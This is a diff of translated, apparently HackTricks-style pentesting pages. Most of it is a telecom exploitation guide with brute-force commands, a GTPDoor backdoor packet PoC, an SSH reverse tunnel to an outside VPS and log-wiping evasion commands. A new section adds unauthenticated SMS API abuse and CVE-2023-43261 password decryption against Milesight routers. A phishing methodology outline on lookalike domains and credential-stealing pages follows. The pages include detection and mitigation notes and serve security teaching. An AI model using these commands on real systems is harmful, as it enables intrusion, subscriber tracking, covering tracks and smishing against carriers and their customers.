diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
index 3b20cc467..ef8a2e645 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
@@ -1,27 +1,27 @@
-# Telecom Network Exploitation (GTP / Roaming Environments)
+# Telecom Netwerkuitbuiting (GTP / Roaming-omgewings)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
-> Mobiele kernprotokolle (GPRS Tunnelling Protocol – GTP) gaan dikwels oor semi-vertroude GRX/IPX roaming-backbones. Omdat hulle op plain UDP met byna geen verifikasie ry nie, **enige foothold binne 'n telecom-perimeter kan gewoonlik direk die kern-seinvlakke bereik**. Die volgende notas versamel offensiewe truuks wat in die veld waargeneem is teen SGSN/GGSN, PGW/SGW en ander EPC-node.
+> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) gaan dikwels deur semi-gevertroude GRX/IPX roaming-backbones. Omdat hulle oor plain UDP ry met byna geen authentikasie nie, **kan enige foothold binne 'n telecom perimeter gewoonlik core signalling planes direk bereik**. Die volgende notas versamel offensive tricks wat in die veld waargeneem is teen SGSN/GGSN, PGW/SGW en ander EPC nodes.
## 1. Recon & Initial Access
-### 1.1 Default OSS / NE Accounts
-'n Verrassend groot aantal verskaffer-netwerkelemente word met hard-coded SSH/Telnet gebruikers gestuur, soos `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … 'n Gespesialiseerde woordlys verhoog dramaties brute-force sukses:
+### 1.1 Standaard OSS / NE-rekeninge
+'n Verstommend groot stel verskaffer-netwerkelemente word saamgestuur met hard-coded SSH/Telnet gebruikers soos `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … 'n toegewyde wordlist verhoog dramaties brute-force sukses:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
-As die toestel slegs 'n management VRF blootstel, pivot eers deur 'n jump host (sien afdeling «SGSN Emu Tunnel» hieronder).
+As die toestel slegs 'n management VRF openbaar, pivot eers via 'n jump host (sien afdeling «SGSN Emu Tunnel» hieronder).
-### 1.2 Gasheerontdekking binne GRX/IPX
-Die meeste GRX-operateurs laat steeds **ICMP echo** oor die backbone toe. Kombineer `masscan` met die ingeboude `gtpv1` UDP probes om vinnig GTP-C listeners in kaart te bring:
+### 1.2 Host Discovery binne GRX/IPX
+Die meeste GRX-operateurs laat steeds **ICMP echo** oor die backbone toe. Kombineer `masscan` met die ingeboude `gtpv1` UDP-probes om vinnig GTP-C-luisteraars in kaart te bring:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
-## 2. Enumerating Subscribers – `cordscan`
+## 2. Enumerering van intekenare – `cordscan`
-Die volgende Go-hulpmiddel vervaardig **GTP-C Create PDP Context Request** pakkette en teken die antwoorde aan. Elke antwoord openbaar die huidige **SGSN / MME** wat die aangevraagde IMSI bedien en, soms, die abonnee se besoekte PLMN.
+Die volgende Go-hulpmiddel samestel **GTP-C Create PDP Context Request** pakkette en registreer die antwoorde. Elke antwoord onthul die huidige **SGSN / MME** wat die gevraagde IMSI bedien en soms die intekenaar se besoekte PLMN.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@@ -31,10 +31,10 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
```
Belangrike vlae:
- `--imsi` Teikenabonnee IMSI
-- `--oper` Home / HNI (MCC+MNC)
-- `-w` Skryf rou packets na pcap
+- `--oper` Tuis / HNI (MCC+MNC)
+- `-w` Skryf rou pakkette na pcap
-Belangrike konstantes binne die binary kan gepatch word om scans te verbreed:
+Belangrike konstantes binne die binêre kan aangepas word om skanderings uit te brei:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
@@ -42,9 +42,9 @@ common_tcp_ports = "22,23,80,443,8080"
```
## 3. Kode-uitvoering oor GTP – `GTPDoor`
-`GTPDoor` is 'n klein ELF-diens wat **binds UDP 2123 and parses every incoming GTP-C packet**. Wanneer die payload met 'n pre-shared tag begin, word die res ontsleuteld (AES-128-CBC) en uitgevoer via `/bin/sh -c`. Die stdout/stderr word exfiltrated binne **Echo Response** messages sodat geen uitgaande sessie ooit geskep word nie.
+`GTPDoor` is 'n klein ELF-diens wat **binds UDP 2123 and parses every incoming GTP-C packet**. Wanneer die payload met 'n pre-shared tag begin, word die oorblyfsel ontsleutel (AES-128-CBC) en uitgevoer via `/bin/sh -c`. Die stdout/stderr word exfiltrated binne **Echo Response** messages sodat geen uitgaande sessie ooit geskep word nie.
-Minimale PoC-pakket (Python):
+Minimal PoC packet (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
@@ -52,14 +52,14 @@ cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
-Opsporing:
-* enige host wat **unbalanced Echo Requests** na SGSN IPs stuur
-* GTP version flag op 1 gestel terwyl message type = 1 (Echo) – afwyking van die spesifikasie
+Detection:
+* enige gasheer wat **unbalanced Echo Requests** na SGSN IP-adresse stuur
+* GTP weergawe-vlag op 1 gestel terwyl message type = 1 (Echo) – afwyking van die spesifikasie
-## 4. Pivoting Deur die Kern
+## 4. Pivoting deur die Kern
### 4.1 `sgsnemu` + SOCKS5
-`OsmoGGSN` verskaf 'n SGSN-emulator wat in staat is om **establish a PDP context towards a real GGSN/PGW**. Sodra dit onderhandel is, ontvang Linux 'n nuwe `tun0` koppelvlak wat vanaf die roaming peer bereikbaar is.
+`OsmoGGSN` lewer 'n SGSN-emulator wat in staat is om **'n PDP-konteks op te stel na 'n werklike GGSN/PGW**. Sodra dit onderhandel is, ontvang Linux 'n nuwe `tun0`-koppelvlak wat vanaf die roaming-peer bereikbaar is.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
@@ -69,23 +69,23 @@ microsocks -p 1080 & # internal SOCKS proxy
Met behoorlike firewall hair-pinning omseiling, omseil hierdie tonnel signalling-only VLANs en beland jy direk in die **data plane**.
### 4.2 SSH Reverse Tunnel over Port 53
-DNS is byna altyd oop in roaming-infrastrukture. Maak 'n interne SSH-diens bloot op jou VPS wat luister op :53 en keer later van die huis terug:
+DNS is byna altyd oop in roaming-infrastrukture. Maak 'n interne SSH-diens op jou VPS beskikbaar wat luister op poort :53, en keer later van die huis af terug:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Kontroleer dat `GatewayPorts yes` op die VPS geaktiveer is.
-## 5. Covert Channels
+## 5. Geheime Kanale
-| Channel | Transport | Decoding | Notes |
-|---------|-----------|----------|-------|
+| Kanaal | Transport | Dekodering | Aantekeninge |
+|--------|-----------|-----------|-------------|
| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | puur passiewe luisteraar, geen uitgaande verkeer |
-| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | hou dop vir `*.nodep` subdomein |
-| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | mengt met legitieme GTP-C-verkeer |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) gekodeer in A-record oktette | kyk uit vir `*.nodep` sub-domein |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | meng met geldige GTP-C verkeer |
-Alle implants implementeer watchdogs wat **timestomp** hul binaries en re-spawn as hulle crashed.
+Alle implants gebruik watchdogs wat hul binaries **timestomp** en weer opstart as hulle crash.
-## 6. Defense Evasion Cheatsheet
+## 6. Verdedigings-omseiling Cheatsheet
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
@@ -116,76 +116,76 @@ Skoonmaakwenk:
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
-## 8. Gereedskap
+## 8. Tool Box
-* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – aangepaste gereedskap soos in vorige afdelings beskryf.
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections.
* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
-* `Microsocks` + `ProxyChains` : liggewig SOCKS5 pivoting
+* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
* `FRP` (≥0.37) : NAT traversal / asset bridging
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
-Die 5G-registrasieprosedure loop oor NAS (Non-Access Stratum) bo-op NGAP. Tot NAS-sekuriteit geaktiveer word deur Security Mode Command/Complete, is aanvanklike boodskappe nie geverifieer of geïnkripteer nie. Hierdie pre-sekuriteitsvenster maak verskeie aanvalspaaie moontlik wanneer jy N2-verkeer kan waarneem of manipuleer (bv., on-path binne die core, rogue gNB, of testbed).
+Die 5G-registrasieprosedure loop oor NAS (Non-Access Stratum) bo-op NGAP. Totdat NAS-sekuriteit geaktiveer word deur Security Mode Command/Complete, is aanvanklike boodskappe nie geverifieer en nie versleuteld nie. Hierdie pre-sekuriteitsvenster maak verskeie aanvalspaaie moontlik wanneer jy N2-verkeer kan observeer of manipuleer (bv. on-path binne die core, rogue gNB, of testbed).
-Registrasie-vloei (vereenvoudig):
-- Registration Request: UE stuur SUCI (geënkripteerde SUPI) en vermoëns.
-- Authentication: AMF/AUSF stuur RAND/AUTN; UE stuur RES* terug.
-- Security Mode Command/Complete: NAS-integriteit en -koderingsalgoritmes word onderhandeld en geaktiveer.
+Registrasievloei (vereenvoudig):
+- Registration Request: UE stuur SUCI (encrypted SUPI) en capabilities.
+- Authentication: AMF/AUSF stuur RAND/AUTN; UE gee RES* terug.
+- Security Mode Command/Complete: NAS-integriteit en ciphering word onderhandeld en geaktiveer.
- PDU Session Establishment: IP/QoS opstelling.
-Laboratorium-opstellingswenke (non-RF):
-- Core: Open5GS standaard implementering is voldoende om vloei te reproduceer.
-- UE: simulator of toets-UE; dekodeer met Wireshark.
-- Aktiewe gereedskap: 5GReplay (capture/modify/replay NAS binne NGAP), Sni5Gect (sniff/patch/inject NAS on the fly sonder om 'n volledige rogue gNB op te sit).
+Laboratorium opstel wenke (non-RF):
+- Core: Open5GS standaard implementering is voldoende om vloei te reproduseer.
+- UE: simulator of test-UE; dekodeer met Wireshark.
+- Aktiewe gereedskap: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Nuttige vertoonfilters in Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
-### 9.1 Identiteitsprivaatheid: SUCI-foute wat SUPI/IMSI blootstel
-Verwagting: UE/USIM moet SUCI stuur (SUPI geënkripteer met die home-network publieke sleutel). Om 'n plaintext SUPI/IMSI in die Registration Request te vind dui op 'n privaatheidsdefek wat volgehoue ontvangeropsporing moontlik maak.
+### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI
+Verwagting: UE/USIM moet SUCI stuur (SUPI encrypted met die home-network public key). Om 'n plaintext SUPI/IMSI in die Registration Request te vind dui op 'n privaatheidsdefek wat volgehoue subscriber-tracking moontlik maak.
Hoe om te toets:
- Capture die eerste NAS-boodskap in InitialUEMessage en inspekteer die Mobile Identity IE.
-- Wireshark vinnige kontrole:
+- Wireshark vinnige kontroles:
- Dit behoort as SUCI te dekodeer, nie as IMSI nie.
-- Filtervoorbeelde: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` behoort te bestaan; afwesigheid tesame met die teenwoordigheid van `imsi` dui op 'n privaatheidsdefek.
+- Filtervoorbeelde: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` behoort te bestaan; afwesigheid plus teenwoordigheid van `imsi` dui op leakage.
-Wat om te versamel:
-- MCC/MNC/MSIN indien blootgestel; log per-UE en spoor oor tyd/liggings.
+Wat om in te samel:
+- MCC/MNC/MSIN indien blootgestel; log per-UE en volg oor tyd/liggings.
Mitigasie:
-- Dwing SUCI-only UE/USIM af; stel alarms op vir enige IMSI/SUPI in die aanvanklike NAS.
+- Forceer SUCI-only UEs/USIMs; waarsku op enige IMSI/SUPI in die aanvanklike NAS.
### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)
Agtergrond:
-- UE adverteer ondersteunde EEA (enkripsie) en EIA (integriteit) in die UE Security Capability IE van die Registration Request.
-- Algemene koppelings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 is nul-algoritmes.
+- UE adverteer ondersteunde EEA (encryption) en EIA (integrity) in die UE Security Capability IE van die Registration Request.
+- Algemene mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 is nul-algoritmes.
-Probleem:
-- Omdat die Registration Request nie integriteitbeskerm is nie, kan 'n on-path aanvaller die vermoënbits uitvee om later tydens Security Mode Command die keuse van EEA0/EIA0 af te dwing. Sommige stacks laat ontereëlwis null-algoritmes toe buite nooddienste.
+Kwessie:
+- Omdat die Registration Request nie integriteitsbeskerm is nie, kan 'n on-path aanvaller capability-bits uitvee om die keuse van EEA0/EIA0 af te dwing later tydens Security Mode Command. Sommige stacks laat ten onregte toe dat nul-algoritmes buite emergency services gebruik word.
-Aanvallende stappe:
-- Intercepteer InitialUEMessage en modifiseer die NAS UE Security Capability om slegs EEA0/EIA0 te adverteer.
-- Met Sni5Gect, hook die NAS-boodskap en patch die capability-bits voordat dit verder gestuur word.
-- Observeer of die AMF null ciphers/integriteit aanvaar en Security Mode met EEA0/EIA0 voltooi.
+Offensiewe stappe:
+- Intersep InitialUEMessage en wysig die NAS UE Security Capability om slegs EEA0/EIA0 te adverteer.
+- Met Sni5Gect, hook die NAS-boodskap en patch die capability-bits voordat dit geforward word.
+- Observeer of AMF null ciphers/integrity aanvaar en Security Mode voltooi met EEA0/EIA0.
-Verifikasie/ sigbaarheid:
+Verifikasie/sigbaarheid:
- In Wireshark, bevestig die geselekteerde algoritmes na Security Mode Command/Complete.
-- Voorbeeld van passiewe sniffer-uitset:
+- Voorbeeld passiewe sniffer-uitset:
```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```
-Mitigations (must):
-- Konfigureer AMF/policy om EEA0/EIA0 te verwerp, behalwe waar dit strikt vereis word (bv., noodoproepe).
-- Voorkeur om ten minste EEA2/EIA2 af te dwing; registreer en waarsku by enige NAS-sekuriteitskonteks wat nul-algoritmes onderhandel.
+Versagtingsmaatreëls (moet):
+- Konfigureer AMF/policy om EEA0/EIA0 te weier, behalwe waar dit streng voorgeskryf is (bv., noodoproepe).
+- Beveel aan om EEA2/EIA2 ten minste af te dwing; registreer en waarsku by enige NAS-sekuriteitskonteks wat null-algoritmes onderhandel.
-### 9.3 Herhaling van aanvanklike Registration Request (pre-security NAS)
-Omdat die aanvanklike NAS integriteit en nuutheid ontbreek, kan 'n opgeneemde InitialUEMessage+Registration Request aan die AMF hergespeel word.
+### 9.3 Replay van aanvanklike Registration Request (pre-security NAS)
+Omdat die aanvanklike NAS geen integriteit of varsheid het nie, kan vasgevangde InitialUEMessage+Registration Request na die AMF gereplayed word.
-PoC rule for 5GReplay to forward matching replays:
+PoC-reël vir 5GReplay om ooreenstemmende replays deur te stuur:
```xml
```
-Wat om op te let:
-- Of die AMF die replay aanvaar en na verifikasie voortgaan; 'n gebrek aan varsheid-/konteksvalidasie dui op blootstelling.
+Wat om waar te neem:
+- Whether AMF accepts the replay and proceeds to Authentication; 'n gebrek aan freshness/context validation dui op blootstelling.
-Mitigering:
-- Handhaaf replay protection/context binding by die AMF; pas rate-limiting toe en korreleer per-GNB/UE.
+Versagtingsmaatreëls:
+- Dwing replay protection/context binding by die AMF af; rate-limit en korreleer per-GNB/UE.
-### 9.4 Gereedskapwenke (reproduceerbaar)
-- Open5GS: start 'n AMF/SMF/UPF om die core te emuleer; monitor N2 (NGAP) en NAS.
-- Wireshark: verifieer die dekodes van NGAP/NAS; pas die bogenoemde filters toe om Registration te isoleer.
-- 5GReplay: vang 'n registration op, en replay dan spesifieke NGAP + NAS-boodskappe soos per die reël.
-- Sni5Gect: live sniff/modify/inject NAS control-plane om null algorithms af te dwing of authentication sequences te versteur.
+### 9.4 Gereedskap-aanwysings (herhaalbaar)
+- Open5GS: start 'n AMF/SMF/UPF op om die core te emuleer; observeer N2 (NGAP) en NAS.
+- Wireshark: verifieer dekodes van NGAP/NAS; pas die filters hierbo toe om Registration te isoleer.
+- 5GReplay: vang 'n Registration op, daarna replay spesifieke NGAP + NAS boodskappe soos per die reël.
+- Sni5Gect: live sniff/modify/inject NAS control-plane om null algorithms af te dwing of authentication sequences te ontwrig.
### 9.5 Verdedigingskontrolelys
-- Inspekteer aanhoudend Registration Request vir plaintext SUPI/IMSI; blokkeer oortredende devices/USIMs.
-- Weier EEA0/EIA0 behalwe vir nou omskryfde noodprosedures; vereis minstens EEA2/EIA2.
-- Ontdek rogue of verkeerd gekonfigureerde infrastruktuur: ongemagtigde gNB/AMF, onverwagte N2 peers.
-- Gee waarskuwings vir NAS security modes wat in null algorithms of gereelde replays van InitialUEMessage resulteer.
+- Inspekteer deurlopend Registration Request vir plaintext SUPI/IMSI; blokkeer oortredende devices/USIMs.
+- Weier EEA0/EIA0 behalwe vir noukeurig gedefinieerde noodprosedures; vereis ten minste EEA2/EIA2.
+- Detecteer ongeoorloofde of verkeerd geconfigureerde infrastruktuur: unauthorized gNB/AMF, unexpected N2 peers.
+- Waarsku oor NAS security modes wat lei tot null algorithms of gereelde replays van InitialUEMessage.
---
+
+## 10. Industriële Sellulêre Routers – Ongeauthentiseerde SMS-API-misbruik (Milesight UR5X/UR32/UR35/UR41) en kredensiële herstel (CVE-2023-43261)
+
+Deur blootgestelde web-APIs van industriële sellulêre routers te misbruik word stealthy, carrier-origin smishing op skaal moontlik. Milesight UR-series routers stel 'n JSON-RPC–styl endpoint by `/cgi` bloot. Wanneer verkeerd geconfigureer, kan die API sonder authentication bevra word om SMS inbox/outbox te lys en, in sommige deployments, om SMS te stuur.
+
+Tipiese ongeauthentiseerde versoeke (dieselfde struktuur vir inbox/outbox):
+```http
+POST /cgi HTTP/1.1
+Host:
+Content-Type: application/json
+
+{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
+```
+
+```json
+{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
+```
+Antwoorde sluit velde in soos `timestamp`, `content`, `phone_number` (E.164), en `status` (`success` or `failed`). Herhaalde `failed` stuurings na dieselfde nommer is dikwels attacker “capability checks” om te verifieer dat 'n router/SIM kan aflewer voordat blasting plaasvind.
+
+Voorbeeld curl om SMS metadata te exfiltrate:
+```bash
+curl -sk -X POST http:///cgi \
+-H 'Content-Type: application/json' \
+-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
+```
+Aantekeninge oor auth-artefakte:
+- Sommige verkeer mag 'n auth cookie insluit, maar 'n groot gedeelte van blootgestelde toestelle reageer sonder enige authenticatie op `query_inbox`/`query_outbox` wanneer die management-koppelvlak Internet-toeganklik is.
+- In omgewings wat auth vereis, previously-leaked credentials (see below) herstel toegang.
+
+Kredensiaalherstelpad – CVE-2023-43261:
+- Aangetaste families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
+- Probleem: web-geserveerde logs (bv. `httpd.log`) is sonder enige authenticatie bereikbaar onder `/lang/log/` en bevat admin-aanmeldingsgebeurtenisse met die wagwoord versleuteld met 'n hardcoded AES key/IV wat in client-side JavaScript teenwoordig is.
+- Praktiese toegang en ontsleuteling:
+```bash
+curl -sk http:///lang/log/httpd.log | sed -n '1,200p'
+# Look for entries like: {"username":"admin","password":""}
+```
+Minimale Python om leaked wagwoorde te dekripteer (AES-128-CBC, hardcoded key/IV):
+```python
+import base64
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import unpad
+KEY=b'1111111111111111'; IV=b'2222222222222222'
+enc_b64='...' # value from httpd.log
+print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
+```
+Jag- en opsporingsideeë (netwerk):
+- Waarsku oor ongeverifieerde `POST /cgi` waarvan die JSON-liggaam `base`/`function` bevat wat op `query_inbox` of `query_outbox` gestel is.
+- Volg herhaalde `POST /cgi` uitbarstings gevolg deur `status":"failed"` inskrywings oor baie unieke nommers vanaf dieselfde bron-IP (capability testing).
+- Inventariseer Internet-blootgestelde Milesight routers; beperk bestuur tot VPN; deaktiveer SMS-funksies tensy vereis; opgradeer na ≥ v35.3.0.7; roteer credentials en hersien SMS-logboeke vir onbekende stuuraksies.
+
+Shodan/OSINT pivots (voorbeelde in die natuur gesien):
+- `http.html:"rt_title"` pas by Milesight router-paneel.
+- Google dorking vir blootgestelde logs: `"/lang/log/system" ext:log`.
+
+Operationele impak: die gebruik van wettige carrier SIMs binne routers gee baie hoë SMS-lewerbaarheid en geloofwaardigheid vir phishing, terwyl inbox/outbox blootstelling sensitiewe metadata op skaal leak.
+
+---
+
## Opsporingsidees
-1. **Enige toestel anders as 'n SGSN/GGSN wat Create PDP Context Requests opstel**.
-2. **Nie-standaard poorte (53, 80, 443) wat SSH handshakes ontvang** van interne IP's.
-3. **Gereelde Echo Requests sonder ooreenstemmende Echo Responses** – kan op GTPDoor beacons dui.
-4. **Hoë koers van ICMP echo-reply verkeer met groot, nie-nul identifier/sequence velde**.
-5. 5G: **InitialUEMessage wat NAS Registration Requests dra wat herhaal word vanaf identiese endpoints** (replay sein).
-6. 5G: **NAS Security Mode wat EEA0/EIA0 onderhandel** buite noodkontekste.
+1. **Enige toestel anders as 'SGSN/GGSN' wat Create PDP Context Requests opstel**.
+2. **Nie-standaard poorte (53, 80, 443) wat SSH-handshakes van interne IP's ontvang**.
+3. **Gereelde Echo Requests sonder ooreenstemmende Echo Responses** – kan op GTPDoor-beacons dui.
+4. **Hoë tempo van ICMP echo-reply verkeer met groot, nie-nul identifier/sequence-velde**.
+5. 5G: **InitialUEMessage wat NAS Registration Requests dra wat herhaal van identiese eindpunte** (replay sein).
+6. 5G: **NAS Security Mode wat EEA0/EIA0 onderhandel buite noodgevalkontekste**.
## Verwysings
-- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
+- [Palo Alto Unit42 – Infiltrasie van Globale Telekomnetwerke](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 – GTPv2-C (v17.6.0)
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 – Security architecture and procedures for 5G System
+- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
+- [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
+- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md
index 22b4e77c4..386d6aae3 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/README.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md
@@ -6,14 +6,14 @@
1. Recon die slagoffer
1. Kies die **slagoffer-domein**.
-2. Voer basiese web-ontleding uit deur **na aanmeldportale te soek** wat deur die slagoffer gebruik word en **besluit** watter een jy gaan **voordoen as**.
-3. Gebruik 'n bietjie **OSINT** om **e-posadresse te vind**.
+2. Voer basiese web-ontleding uit deur te **soek na aanmeldportale** wat deur die slagoffer gebruik word en **besluit** watteren jy gaan **namaak**.
+3. Gebruik bietjie **OSINT** om **e-posadresse te vind**.
2. Berei die omgewing voor
1. **Koop die domein** wat jy gaan gebruik vir die phishing-assessering
2. **Konfigureer die e-posdiens** verwante rekords (SPF, DMARC, DKIM, rDNS)
3. Konfigureer die VPS met **gophish**
3. Berei die veldtog voor
-1. Berei die **e-possjabloon** voor
+1. Berei die **e-pos-sjabloon** voor
2. Berei die **webblad** voor om die inlogbewyse te steel
4. Begin die veldtog!
@@ -21,8 +21,8 @@
### Tegnieke vir domeinnaamvariasie
-- **Keyword**: Die domeinnaam **bevat** 'n belangrike **sleutelwoord** van die oorspronklike domein (e.g., zelster.com-management.com).
-- **hypened subdomain**: Vervang die **punt** met 'n **koppelteken** in 'n subdomein (e.g., www-zelster.com).
+- **Sleutelwoord**: Die domeinnaam **bevat** 'n belangrike **sleutelwoord** van die oorspronklike domein (e.g., zelster.com-management.com).
+- **hypened subdomain**: Vervang die **punt met 'n koppelteken** in 'n subdomein (e.g., www-zelster.com).
- **New TLD**: Dieselfde domein wat 'n **nuwe TLD** gebruik (e.g., zelster.org)
- **Homoglyph**: Dit **vervang** 'n letter in die domeinnaam met **letters wat soortgelyk lyk** (e.g., zelfser.com).
@@ -30,14 +30,14 @@
{{#ref}}
homograph-attacks.md
{{#endref}}
-- **Transposition:** Dit **ruil twee letters om** in die domeinnaam (e.g., zelsetr.com).
+- **Transposition:** Dit **ruil twee letters** in die domeinnaam (e.g., zelsetr.com).
- **Singularization/Pluralization**: Voeg of verwyder “s” aan die einde van die domeinnaam (e.g., zeltsers.com).
-- **Omission**: Dit verwyder een van die letters uit die domeinnaam (e.g., zelser.com).
-- **Repetition:** Dit herhaal een van die letters in die domeinnaam (e.g., zeltsser.com).
-- **Replacement**: Soortgelyk aan homoglyph, maar minder sluipend. Dit vervang een van die letters in die domeinnaam, dalk met 'n letter wat naby die oorspronklike op die sleutelbord is (e.g., zektser.com).
-- **Subdomained**: Voeg 'n **punt** binne die domeinnaam in (e.g., ze.lster.com).
-- **Insertion**: Dit **voeg 'n letter in** die domeinnaam in (e.g., zerltser.com).
-- **Missing dot**: Hang die TLD aan die einde van die domeinnaam sonder die punt (e.g., zelstercom.com)
+- **Omission**: Dit **verwyder een** van die letters uit die domeinnaam (e.g., zelser.com).
+- **Repetition:** Dit **herhaal een** van die letters in die domeinnaam (e.g., zeltsser.com).
+- **Replacement**: Soortgelyk aan homoglyph maar minder stil. Dit vervang een van die letters in die domeinnaam, moontlik met 'n letter naby die oorspronklike op die sleutelbord (e.g, zektser.com).
+- **Subdomained**: Stel 'n **punt** binne die domeinnaam in (e.g., ze.lster.com).
+- **Insertion**: Dit **voeg 'n letter in** die domeinnaam (e.g., zerltser.com).
+- **Missing dot**: Voeg die TLD by die domeinnaam sonder 'n punt. (e.g., zelstercom.com)
**Automatic Tools**
@@ -52,25 +52,25 @@ homograph-attacks.md
### Bitflipping
-Daar is 'n **moontlikheid dat een of meer bits wat gestoor is of in kommunikasie is outomaties omgeskakel kan word** as gevolg van verskeie faktore soos sonvlamme, kosmiese strale, of hardeware-foute.
+Daar is 'n **moontlikheid dat een of meer bits wat gestoor is of in kommunikasie is, outomaties omgeskakel kan word** as gevolg van verskeie faktore soos sonvlamme, kosmiese strale, of hardeware-foute.
-Wanneer hierdie konsep op **DNS-versoeke toegepas** word, is dit moontlik dat die **domein wat deur die DNS-bediener ontvang word** nie dieselfde is as die domein wat aanvanklik gevra is nie.
+Wanneer hierdie konsep op **DNS requests** **toegepas** word, is dit moontlik dat die **domein wat die DNS-server ontvang** nie dieselfde is as die domein aanvanklik versoek nie.
-Byvoorbeeld, 'n enkele bit-wysiging in die domein "windows.com" kan dit verander na "windnws.com."
+Byvoorbeeld, 'n enkele bitwysiging in die domein "windows.com" kan dit verander na "windnws.com."
-Aanvallers kan **hierdie voordeel benut deur meerdere bit-flipping-domeine te registreer** wat soortgelyk is aan die slagoffer se domein. Hul bedoeling is om regmatige gebruikers na hul eie infrastruktuur om te lei.
+Aanhangers mag **hierby voordeel trek deur verskeie bit-flipping domeine te registreer** wat soortgelyk is aan die slagoffer se domein. Hul bedoeling is om geldige gebruikers na hul eie infrastruktuur om te lei.
-For more information read [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
+Vir meer inligting lees [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
### Koop 'n vertroude domein
-Jy kan in [https://www.expireddomains.net/](https://www.expireddomains.net) soek vir 'n verloopte domein wat jy kan gebruik.\
-Om seker te maak dat die verloopte domein wat jy gaan koop **reeds 'n goeie SEO het**, kan jy kyk hoe dit gekategoriseer is in:
